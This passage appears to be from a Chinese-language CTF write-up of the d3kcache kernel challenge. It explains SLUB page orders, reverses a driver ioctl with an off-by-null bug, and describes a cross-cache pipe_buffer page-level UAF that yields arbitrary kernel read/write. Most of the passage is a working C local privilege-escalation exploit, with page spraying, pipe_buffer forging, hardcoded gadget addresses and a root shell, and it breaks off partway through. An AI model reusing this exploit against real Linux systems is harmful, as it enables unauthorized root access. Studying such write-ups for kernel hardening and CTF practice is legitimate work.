* architectures, there can be many possible cpus, but never
* onlined. Here we compromise between trying to avoid too high
* order on systems that appear larger than they are, and too
* low order on systems that appear smaller than they are.
*/
nr_cpus = num_present_cpus();
if (nr_cpus <= 1)
nr_cpus = nr_cpu_ids;
min_objects = 4 * (fls(nr_cpus) + 1);
}
max_objects = order_objects(slub_max_order, size);
min_objects = min(min_objects, max_objects);

... ...
}

可能各位会疑惑为什么kmalloc-4korder为3,这里重新看calculate_order函数,可以看到在对min_objects变量赋值的最后一个操作就是选取最小的。

1
2
3
4
static inline unsigned int order_objects(unsigned int order, unsigned int size)
{
return ((unsigned int)PAGE_SIZE << order) / size;
}

order_objects函数内部是这样的,并且此时slub_max_order的值为3,所以当size为4k时也就是0x1000max_objects的值为0x8,所以按照这样计算的话后续求得的order为3。

d3kcache

前面铺垫了这么多终于到了题目了,如果有了前面提到的所有基础理论知识再来看这道题的话,依旧无法很轻松的完成

题目在开了基本的保护之外还开启了很多的编译选项中的保护

1
2
3
4
5
6
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""
CONFIG_SLUB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y

这些基本的都是开启了的,除此之外还开启了一个Control Flow Integrity保护。

1
CONFIG_CFI_CLANG=y

而这个保护会检测ops是否合法,这个检测十分严格,需要ops的值与一个固定的内容进行异或,结果不为0就直接触发kernel panic。也就是因为当时不清楚这个内容导致我调了半天去劫持pipe_buffer的ops指针。

驱动分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
__int64 init_module()
{
unsigned int v0; // ebx

printk(&unk_96B);
major_num = _register_chrdev(0LL, 0LL, 256LL, "d3kcache", &d3kcache_fo);
if ( major_num >= 0 )
{
module_class = _class_create(&_this_module, "d3kcache", &d3kcache_module_init___key);
if ( (unsigned __int64)module_class < 0xFFFFFFFFFFFFF001LL )
{
printk(&unk_A0D);
v0 = 0;
module_device = device_create(module_class, 0LL, (unsigned int)(major_num << 20), 0LL, "d3kcache");
if ( (unsigned __int64)module_device < 0xFFFFFFFFFFFFF001LL )
{
printk(&unk_A66);
spin = 0;
kcache_jar = kmem_cache_create_usercopy("kcache_jar", 0x800LL, 0LL, 67379200LL, 0LL, 2048LL, 0LL);
memset(kcache_list, 0, 0x100uLL);
}
else
{
class_destroy(module_class);
_unregister_chrdev((unsigned int)major_num, 0LL, 256LL, "d3kcache");
printk(&unk_A3B);
return (unsigned int)module_device;
}
}
else
{
_unregister_chrdev((unsigned int)major_num, 0LL, 256LL, "d3kcache");
printk(&unk_9DE);
return (unsigned int)module_class;
}
}
else
{
printk(&unk_9AD);
return (unsigned int)major_num;
}
return v0;
}

首先看初始化模块部分,可以看到里面调用了前面提到的kmem_cache_create_usercopy函数,并且参数中size指定为0x800,那么根据前面所以到的,这里的order即为3。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
__int64 __fastcall d3kcache_ioctl(__int64 a1, int a2, __int64 a3)
{
__int64 v4; // rax
__int64 v5; // rbx
int v7; // ecx
__int64 v8; // r14
__int64 v9; // r15
__int64 v10; // r12
int v11; // ecx
__int64 v12; // rbx
__int64 v13; // r14
__int64 v14; // r15
__int64 v15; // rax
__int64 v16; // r15
unsigned int v17; // r13d
__int64 v18; // r14
__int64 v19; // r12
__int64 v20; // r14
unsigned __int64 v21; // rbx
__int64 v22; // rax
__int64 v23; // r12
unsigned __int64 v24; // rbx
void *v25; // rdi
unsigned int v26; // [rsp-48h] [rbp-48h] BYREF
unsigned int v27; // [rsp-44h] [rbp-44h]
__int64 v28; // [rsp-40h] [rbp-40h]
unsigned __int64 v29; // [rsp-38h] [rbp-38h]

v29 = __readgsqword(0x28u);
raw_spin_lock(&spin);
v4 = copy_from_user(&v26, a3, 16LL);
v5 = -1LL;
if ( v4 )
goto LABEL_2;
if ( a2 > 0x80F )
{
if ( a2 == 0x810 )
{
if ( v26 > 0xFuLL || !qword_17D8[2 * v26] )
{
v25 = &unk_882;
goto LABEL_46;
}
kmem_cache_free(kcache_jar);
v20 = (int)v26;
if ( (unsigned __int64)(int)v26 > 0xF )
{
_ubsan_handle_out_of_bounds(&off_12A0, v26);
v21 = (int)v26;
qword_17D8[2 * v20] = 0LL;
if ( v21 >= 0x10 )
_ubsan_handle_out_of_bounds(&off_12C0, (unsigned int)v21);
}
else
{
qword_17D8[2 * (int)v26] = 0LL;
v21 = (unsigned int)v20;
}
kcache_list[4 * v21] = 0;
v5 = 0LL;
}
else
{
if ( a2 != 6425 )
goto LABEL_42;
if ( v26 > 0xFuLL || !qword_17D8[2 * v26] )
{
v25 = &unk_85D;
goto LABEL_46;
}
v11 = v27;
if ( v27 > kcache_list[4 * v26] )
v11 = kcache_list[4 * v26];
if ( v11 < 0 )
BUG();
v12 = (unsigned int)v11;
v13 = qword_17D8[2 * v26];
v14 = v28;
_check_object_size(v13, (unsigned int)v11, 1LL);
v5 = -(__int64)(copy_to_user(v14, v13, v12) != 0);
}
}
else
{
if ( a2 != 0x114 )
{
if ( a2 == 0x514 )
{
if ( v26 <= 0xFuLL && qword_17D8[2 * v26] )
{
v7 = v27;
if ( v27 > 0x800 || v27 + kcache_list[4 * v26] >= 0x800 )
v7 = 2048 - kcache_list[4 * v26];
if ( v7 < 0 )
BUG();
v8 = qword_17D8[2 * v26] + (unsigned int)kcache_list[4 * v26];
v9 = (unsigned int)v7;
v10 = v28;
_check_object_size(v8, (unsigned int)v7, 0LL);
if ( !copy_from_user(v8, v10, v9) )
{
*(_BYTE *)(v8 + v9) = 0;
v5 = 0LL;
}
goto LABEL_2;
}
v25 = &unk_837;
LABEL_46:
printk(v25);
goto LABEL_2;
}
LABEL_42:
v25 = &unk_8AA;
goto LABEL_46;
}
if ( v26 >= 0x10uLL )
{
v25 = &unk_782;
goto LABEL_46;
}
if ( qword_17D8[2 * v26] )
{
v25 = &unk_7F6;
goto LABEL_46;
}
v15 = kmem_cache_alloc(kcache_jar, 0xDC0LL);
if ( !v15 )
{
v25 = &unk_81A;
goto LABEL_46;
}
v16 = v15;
v17 = v27;
v18 = 2048LL;
if ( v27 < 0x800 )
v18 = v27;
v19 = v28;
_check_object_size(v15, v18, 0LL);
if ( copy_from_user(v16, v19, v18) )
{
kmem_cache_free(kcache_jar);
}
else
{
v22 = 0x7FFLL;
if ( v17 < 0x7FF )
v22 = v17;
*(_BYTE *)(v16 + v22) = 0;
v23 = (int)v26;
if ( (unsigned __int64)(int)v26 > 0xF )
{
_ubsan_handle_out_of_bounds(&off_1260, v26);
v24 = (int)v26;
qword_17D8[2 * v23] = v16;
if ( v24 >= 0x10 )
_ubsan_handle_out_of_bounds(&off_1280, (unsigned int)v24);
}
else
{
qword_17D8[2 * (int)v26] = v16;
v24 = (unsigned int)v23;
}
kcache_list[4 * v24] = v18;
v5 = 0LL;
}
}
LABEL_2:
raw_spin_unlock(&spin);
return v5;
}

再就是ioctl函数,逆向分析过后可以发现这里分为四个分支,也就是增删改查,这里漏洞发生在增和改的部分,存在很明显的off by null。除此之外再无其他漏洞。

预期利用分析

根据前面所述的内容,目前已经达到了vuln slab pagevictim slab page相邻的情况了,而经过后续的分析我们可以得知前面两个页面分别对应的是题目中创建的slab pagepipe_buffer所在的slab_page。答案已经呼之欲出了,如果我们使用题目的off by null漏洞,我们就可以让pipe_buffer->page指针指向其他pipe_buffer所指向的位置,而如果我们控制其中一个pipe_buffer并释放掉page,就形成了页级的UAF。不过page的大小只有0x40所以成功率只有1/4,因为以0x00结尾时off by null无法影响其指向。

image-20230519171327450

image-20230519171353853

目前我们已经形成了页级的UAF,那么如果我们在已经free的page处申请pipe_buffer会发生什么呢?

image-20230519173248182

结果就是会形成如上图一样的结构,此时我们可以通过最左边的pipe_buffer读取到它page指向的新的pipe_buffer中的内容,并且此时我们不光可以读取还可以对page的内容进行写,可以让最右边的两个pipe_buffer的page指针又指向同一个,从而形成下面这种情况:image-20230519173704454

根据上面的思路,我们还可以将最右边的page给free掉又一次造成了页级的UAF,但是这一次不同的是我们通过第一次的泄漏可以知道最右边page的地址的。有趣的来了,在最右边造成了页级的UAF之后我们继续申请pipe_buffer放在最右边的page中,并且控制里面pipe_buffer的page指针指向自身,最终形成下面这种情况:

image-20230519174027597

因为是一个页级UAF的缘故,我们还可以使用中间的pipe去修改下面的其他pipe_buffer,所以在最右侧,我们总共可以控制到三个pipe_buffer。而这三个pipe_buffer的作用分别是:

  1. 第一个管道通过page指针内存空间的任意地址读写
  2. 第二个管道用于修改第三个管道的内容,让第三个管道可以指向第一个管道
  3. 第三个管道用于修改第一个管道和第二个管道,修改第一个管道的page到指定位置,修改第二个管道的指向为第三个管道

这样三个管道实现互相循环修改,即可实现整个内核内存空间几乎无任何限制的任意地址读写。

既然已经可以任意地址无限制读写了,那么提权的方式也就多种多样了。当然,这里需要提前注意到的是pipe_buffer中的page指针终归是要指向到page结构体的。而内核中vmemmap区域中存放着所有的page结构体,所以首要找到vmemmap区域即可。

那么第一种方法就是通过修改task_struct中的cred指针为init_cred的地址。

第二种方法就是通过写内核栈实现ROP的办法,首先需要泄漏出栈地址,在task_struct结构体中存在一个stack成员,顾名思义其中存放的就是栈地址,不过这里存放的是虚拟地址。不过我们如果要往栈空间中写内容的话需要知道他对应的物理地址对应的page结构地址。好在我们可以通过页表获取到对应的物理地址,在task_struct结构体中的mm成员中存放的是mm_struct结构体的地址,而我们可以通过mm_struct结构体中的pgd成员获取到页表的地址。最后通过也变转化即可获取到栈地址对应的page结构体地址了,进而往栈中写入准备的rop即可。

第三种方法就是通过USMA进行利用也就是用户态映射攻击,原理则是修改内核代码段的内容,不过直接通过直接映射区去修改的话会因为没有写入权限造成kernel panic。但是,改写内核代码段的本质是向其所对应的物理页面写入数据,所以既然我们可以对页表进行读写,那么我们就可以直接在用户空间建立一个到内核代码段对应物理内存的映射就可以改写内核代码了。

综上所述,可得exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
#define _GNU_SOURCE
#include <err.h>
#include <inttypes.h>
#include <sched.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <stdint.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <time.h>

#define PGV_PAGE_NUM 1000
#define PGV_1PAGE_SPRAY_NUM 0x20
#define PGV_4PAGES_SPRAY_NUM 0x40
#define PGV_4PAGES_START_IDX 0x20
#define PGV_8PAGES_SPRAY_NUM 0x40
#define PGV_8PAGES_START_IDX 0x60
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

#define PIPE_SPRAY_NUM 200
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

void errExit(char *err_msg)
{
puts(err_msg);
exit(-1);
}

size_t user_cs, user_ss, user_sp, user_rflags;
void save_status()
{
__asm__(
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*]status has been saved.");
}

void get_shell()
{
if (getuid())
{
printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
exit(-1);
}
printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
system("/bin/sh");
}

unsigned long kernel_addr;
unsigned long kernel_base;
unsigned long kernel_offset;
int fd;

struct option
{
unsigned int idx;
unsigned int size;
char *buf;
};

void create(unsigned int idx, unsigned int size, char *buf)
{
struct option *option = malloc(sizeof(struct option));
option->idx = idx;
option->size = size;
option->buf = buf;
ioctl(fd, 0x114, option);
}

void delete(unsigned int idx)
{
struct option *option = malloc(sizeof(struct option));
option->idx = idx;
ioctl(fd, 0x810, option);
}

void show(unsigned int idx, unsigned int size, char *buf)
{
struct option *option = malloc(sizeof(struct option));
option->idx = idx;
option->size = size;
option->buf = buf;
ioctl(fd, 0x1919, option);
}

void edit(unsigned int idx, unsigned int size, char *buf)
{
struct option *option = malloc(sizeof(struct option));
option->idx = idx;
option->size = size;
option->buf = buf;
ioctl(fd, 0x514, option);
}

struct pgv_page_request
{
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

enum tpacket_versions
{
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

struct tpacket_req
{
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

int cmd_pipe_req[2], cmd_pipe_reply[2];

int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0)
{
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
return ret;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0)
{
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
close(socket_fd);
return ret;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0)
{
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
close(socket_fd);
return ret;
}

return socket_fd;
}

int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = 0,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = 1,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

usleep(10000);

return ret;
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

struct pipe_buffer
{
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

int pipe_fd[PIPE_SPRAY_NUM][2];
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
int self_4th_pipe_pid = -1;
int self_2nd_pipe_pid = -1;
int self_3rd_pipe_pid = -1;
char temp_zero_buf[0x1000] = {'\0'};

void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

read(pipe_fd[self_2nd_pipe_pid][0], dst, 0xfff);
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

write(pipe_fd[self_2nd_pipe_pid][1], src, len);
}

uint64_t page_offset_base;
uint64_t vmemmap_base;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

#define COMMIT_CREDS 0xffffffff811284e0
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff82201a90
#define INIT_CRED 0xffffffff83079ee8
#define POP_RDI_RET 0xffffffff810157a9
#define RET 0xffffffff810157aa

#define PTE_OFFSET 12
#define PMD_OFFSET 21
#define PUD_OFFSET 30
#define PGD_OFFSET 39

#define PT_ENTRY_MASK 0b111111111UL
#define PTE_MASK (PT_ENTRY_MASK << PTE_OFFSET)
#define PMD_MASK (PT_ENTRY_MASK << PMD_OFFSET)
#define PUD_MASK (PT_ENTRY_MASK << PUD_OFFSET)
#define PGD_MASK (PT_ENTRY_MASK << PGD_OFFSET)

#define PTE_ENTRY(addr) ((addr >> PTE_OFFSET) & PT_ENTRY_MASK)
#define PMD_ENTRY(addr) ((addr >> PMD_OFFSET) & PT_ENTRY_MASK)
#define PUD_ENTRY(addr) ((addr >> PUD_OFFSET) & PT_ENTRY_MASK)
#define PGD_ENTRY(addr) ((addr >> PGD_OFFSET) & PT_ENTRY_MASK)

// #define PAGE_ATTR_RW (1UL << 1)
#define PAGE_ATTR_NX (1UL << 63)

#define NS_CAPABLE_SETID 0xffffffff810fd2a0

int main()
{
save_status();

char *buf = malloc(0x2000);
char target[16];
size_t target_addr;

strcpy(target, "trytofind196082");
if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0)
{
errExit("cannot set name");
}

fd = open("/dev/d3kcache", O_RDWR);
if (fd == -1)
{
errExit("[-] faild open d3kcache!");
}

pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

if (!fork())
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

while (1)
{
read(cmd_pipe_req[0], &req, sizeof(req));
if (req.cmd == 0)
{
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
}
else if (req.cmd == 1)
{
ret = close(socket_fd[req.idx]);
}
else if (req.cmd == 2)
{
exit(0);
}
write(cmd_pipe_reply[1], &ret, sizeof(ret));
}
}
int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;
{

puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++)
{
if (alloc_page(i, 0x1000, 1) < 0)
{
printf("[x] failed to create %d socket for pages spraying!\n", i);
errExit("Faild to spray pgv!");
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++)
{
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0)
{
printf("[x] failed to create %d socket for pages spraying!\n", i);
errExit("Faild to spray pgv!");
}
}

puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++)
{
if (i % 19 == 0)
{
free_page(pgv_4pages_start_idx++);
}

if (i % 21 == 0)
{
free_page(pgv_1page_start_idx += 2);
}

if (i % 512 == 0)
{
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0)
{
printf("[x] failed to create %d socket for pages spraying!\n", i);
errExit("Faild to spray pgv!");
}
}
}

int victim_pid = -1;
int orig_pid = -1;

{
puts("[*] spray pipe_buffer...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{

if (pipe(pipe_fd[i]) < 0)
{
printf("[x] failed to alloc %d pipe!", i);
errExit("FAILED to create pipe!");
}
}
puts("[*] exetend pipe_buffer...");
for (int i = 0; i < (PIPE_SPRAY_NUM / 2); i++)
{
if (i % 8 == 0)
{
free_page(pgv_8pages_start_idx++);
}

if (fcntl(pipe_fd[0 + i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0)
{
printf("[x] failed to extend %d pipe!\n", 0 + i);
errExit("FAILED to extend pipe!");
}
}
puts("[*] spray vulnerable 2k obj...");
free_page(pgv_8pages_start_idx++);
for (int i = 0; i < 0x10; i++)
{
create(i, 8, "0x196082");
}
puts("[*] exetend pipe_buffer...");
for (int i = 0; i < (PIPE_SPRAY_NUM / 2); i++)
{
if (i % 8 == 0)
{
free_page(pgv_8pages_start_idx++);
}

if (fcntl(pipe_fd[(PIPE_SPRAY_NUM / 2) + i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0)
{
printf("[x] failed to extend %d pipe!\n", (PIPE_SPRAY_NUM / 2) + i);
errExit("FAILED to extend pipe!");
}
}
puts("[*] allocating pipe pages...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
write(pipe_fd[i][1], "0x196082", 8);
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "0x196082", 8);
write(pipe_fd[i][1], "0x196082", 8);
}

puts("[*] trigerring cross-cache off-by-null...");
show(0, 0, buf);
memset(buf, 0x61, 0x800);
for (int i = 0; i < 0x10; i++)
{
edit(i, 0x7f8, buf);
}
show(0, 0, buf);
puts("[*] checking for corruption...");

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
char str_flag[0x10];
int nr;

memset(str_flag, '\0', sizeof(str_flag));
read(pipe_fd[i][0], str_flag, 8);
read(pipe_fd[i][0], &nr, sizeof(int));
if (!strcmp(str_flag, "0x196082") && nr != i)
{
orig_pid = nr;
victim_pid = i;
printf("\033[32m\033[1m[+] Found victim: \033[0m%d "
"\033[32m\033[1m, orig: \033[0m%d\n\n",
victim_pid, orig_pid);
break;
}
}
if (victim_pid == -1)
{
errExit("FAILED to corrupt pipe_buffer!");
}
}

int snd_orig_pid = -1;
int snd_vicitm_pid = -1;
struct pipe_buffer info_pipe_buf;

{
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

memset(buf, '\0', sizeof(buf));

write(pipe_fd[victim_pid][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));

puts("[*] free original pipe...");
close(pipe_fd[orig_pid][0]);
close(pipe_fd[orig_pid][1]);

puts("[*] fcntl() to set the pipe_buffer on victim page...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid)
{
continue;
}

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0)
{
printf("[x] failed to resize %d pipe!\n", i);
errExit("FAILED to re-alloc pipe_buffer!");
}
}

read(pipe_fd[victim_pid][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
read(pipe_fd[victim_pid][0], &info_pipe_buf, sizeof(info_pipe_buf));

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

if ((size_t)info_pipe_buf.page < 0xffff000000000000 || (size_t)info_pipe_buf.ops < 0xffffffff81000000)
{
errExit("FAILED to re-hit victim page!");
}

puts("\033[32m\033[1m[+] Successfully to hit the UAF page!\033[0m");
printf("\033[32m\033[1m[+] Got page leak:\033[0m %p\n", info_pipe_buf.page);
puts("");

puts("[*] construct a second-level uaf pipe page...");
info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
write(pipe_fd[victim_pid][1], &info_pipe_buf, sizeof(info_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
int nr;

if (i == orig_pid || i == victim_pid)
{
continue;
}

read(pipe_fd[i][0], &nr, sizeof(nr));
if (nr < PIPE_SPRAY_NUM && i != nr)
{
snd_orig_pid = nr;
snd_vicitm_pid = i;
printf("\033[32m\033[1m[+] Found second-level victim: \033[0m%d "
